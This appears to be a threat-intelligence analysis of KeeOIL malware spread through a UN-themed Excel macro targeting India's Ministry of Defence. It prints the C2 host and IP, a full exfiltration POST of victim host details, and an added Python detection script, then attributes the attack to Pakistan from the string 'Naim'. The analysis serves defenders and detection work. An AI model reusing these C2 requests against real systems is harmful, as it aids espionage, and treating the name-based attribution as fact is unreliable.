India has the second largest troop contribution to the United Nations Peacekeepers, so the theme is effective when targeting India’s Ministry of Defence. The malicious Excel document uses a malicious macro to drop a few files on the victim’s computer. The macro method allows the malware to work on later and newer versions of Microsoft Office.
UNITED_NATIONS_MILITARY_OBSERVERS____COURSE___UNMOC-19_.xls (7fa6689ec0a8863e5084d30de4b9b252)
After the malicious Excel file is opened, the following KeeOIL files are dropped on the victim’s computer:
C:\Users\admin\Documents\hadram.exe (801f94bedb9481fb65709457c1f4c47a)
C:\Users\admin\Documents\hadram.zip (0f3488c89f4f519ceba2c97e83d12af2)
C:\ProgramData\ekeoil\ekeoil.exe (ab68db5c97f9ee12ca29c1eed881781d)
C:\Users\All Users\ekeoil\ekeoil.exe (ab68db5c97f9ee12ca29c1eed881781d)
Connection Test
Before connecting to the C2, the malware performs connectivity tests. The first request is sent to:
Host: www.google.com
User-Agent: google/dance
Then the second test is made to:
quora.com (**ekeoil.exe contains a reference to the string "https://www.quora.com/If-programming-languages-had-honest-slogans-what-would-they-be"**)
After the connectivity tests succeed, the KeeOIL malware connects to its C2:
Host: firebasebox.com
IP: 157.230.112.219
GET firebasebox.com/tootie292/reboshw/c0_nCussi0N.php
User-Agent: ekeoil/3.1.1.5
The KeeOIL malware drops two XML files containing the username and password it needs to POST data to the C2:
C:\ProgramData\ekeoil\ekeoil.xml
C:\Users\All Users\ekeoil\ekeoil.xml
The KeeOIL malware POSTs information about the victim’s computer, including its computer name, IP address, running processes and other details. KeeOIL sends this information to one of two separate PHP files on the C2 server, depending on what is being posted.
The computer name, OS type and IP address are posted to:
firebasebox.com/tootie292/reboshw/1Inter-view_Call.php
POST http://firebasebox.com/tootie292/reboshw/1Inter-view_Call.php
USERNAME=WindowsUser-None-5360-Ver3.1.1.4&TOKEN=DUglBQTl1_cavzqNBTuuJQ%3d%3d&ComputerName=WIN-XXYYZZ8Q89R&Caption_OperatingSystem=Microsoft+Windows+7+Professional+&LocalIp=192.168.160.1&type=PC&Version=3.1.1.5

HTTP/1.1 200 OK
Running processes will be posted to:
http://firebasebox.com/tootie292/reboshw/iLln_Ess_is_0k.php
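As an added illustration, not part of the original write-up, the following Python script turns the network behaviour described above (the google/dance connectivity check, the ekeoil/ User-Agent, the firebasebox.com host and /tootie292/reboshw/ path, and the host-profile POST) into detection logic and runs it over a few constructed proxy log lines. The one-line "client method url "user-agent" body" log layout is an assumption made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Indicators taken from the KeeOIL write-up above.
CHECK_UA = "google/dance"                    # connectivity-test User-Agent
C2_UA_PREFIX = "ekeoil/"                     # C2 User-Agent, e.g. ekeoil/3.1.1.5
C2_HOSTS = {"firebasebox.com", "157.230.112.219"}
C2_PATH_PREFIX = "/tootie292/reboshw/"
PROFILE_KEYS = {"USERNAME", "TOKEN", "ComputerName"}  # fields of the host-profile POST

# Constructed proxy log (not real telemetry). Layout assumed: client method url "ua" body
SAMPLE_LOG = """\
10.0.0.5 GET http://www.google.com/ "google/dance" -
10.0.0.5 GET http://firebasebox.com/tootie292/reboshw/c0_nCussi0N.php "ekeoil/3.1.1.5" -
10.0.0.5 POST http://firebasebox.com/tootie292/reboshw/1Inter-view_Call.php "ekeoil/3.1.1.5" USERNAME=WindowsUser-None-5360-Ver3.1.1.4&TOKEN=DUglBQTl1_cavzqNBTuuJQ%3d%3d&ComputerName=WIN-XXYYZZ8Q89R&Caption_OperatingSystem=Microsoft+Windows+7+Professional+&LocalIp=192.168.160.1&type=PC&Version=3.1.1.5
10.0.0.7 GET http://www.google.com/ "Mozilla/5.0" -
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" (\S+)$')


def classify_request(line):
    """Return a finding dict for a KeeOIL-looking request, or None for a benign line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, method, url, ua, body = m.groups()
    parts = urlsplit(url)
    reasons = []
    if ua == CHECK_UA:
        reasons.append("connectivity-check user-agent")
    if ua.startswith(C2_UA_PREFIX):
        reasons.append("keeoil user-agent")
    if parts.hostname in C2_HOSTS:
        reasons.append("known c2 host")
    if parts.path.startswith(C2_PATH_PREFIX):
        reasons.append("c2 uri prefix")
    # Decode the POST body so the exfiltrated host profile can be read back.
    fields = dict(parse_qsl(body)) if method == "POST" and body != "-" else {}
    if PROFILE_KEYS.issubset(fields):
        reasons.append("host profile post")
    if not reasons:
        return None
    return {"client": client, "url": url, "reasons": reasons, "fields": fields}


def scan_log(text):
    """Run classify_request over every log line and keep only the findings."""
    return [f for f in map(classify_request, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["url"], ", ".join(finding["reasons"]))
```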
Geopolitical Note regarding India as of February 2019 and “Mr. Naim”
India is not a popular country in the region, especially with its two border-sharing opponents, China and Pakistan, who have been known to pursue cyber espionage against India; India conducts the same kind of cyber espionage against them in return.
The Afghan Peace Process between America and the Taliban has a significant impact on India. A potential agreement between America and the Taliban would leave India a major loser in that scenario. India has been working with the Afghan government to counter Pakistan since the nearly two-decade war began, and Pakistan sees the peace process as a way to withdraw its troops from the western border with Afghanistan (where they are deployed for counterinsurgency missions) and move them to its eastern border against India, its arch-nemesis.
A string in “hadram.exe” caught our attention: “}Naim”. Naim is a very popular Arabic name, and it is extremely popular in Pakistan.